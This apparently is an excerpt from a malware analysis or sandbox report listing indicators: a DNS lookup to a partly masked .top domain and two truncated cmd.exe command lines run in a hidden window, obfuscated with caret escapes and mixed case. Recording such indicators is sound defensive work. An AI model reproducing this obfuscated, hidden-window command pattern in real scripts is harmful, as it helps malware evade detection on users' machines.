Technical Information
- DNS ASK ss####ahotie.top
- '<SYSTEM32>\cmd.exe' /c ^cD %lOCalapPDATA%.EXeYb^yHIl^YLkI^kj^u^bU^n^i^X^q^Y^XbO^boJysV^Uf^anMiM^aB^ozF^UCv^E^w^ufR^INdAHVEgGE^lE^j^fAwEDhUxzO^X^a^BUwbIhOsYb^Afxu^baZxYhVUWP^Iq^XuP^Jo^TU^HYz^Y^ZUXUGoz^ki^dYx^Y^GnEG...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c ^cD %lOCalapPDATA%.EXeYb^yHIl^YLkI^kj^u^bU^n^i^X^q^Y^XbO^boJysV^Uf^anMiM^aB^ozF^UCv^E^w^ufR^INdAHVEgGE^lE^j^fAwEDhUxzO^X^a^BUwbIhOsYb^Afxu^baZxYhVUWP^Iq^XuP^Jo^TU^HYz^Y^ZUXUGoz^ki^dYx^Y^GnEG...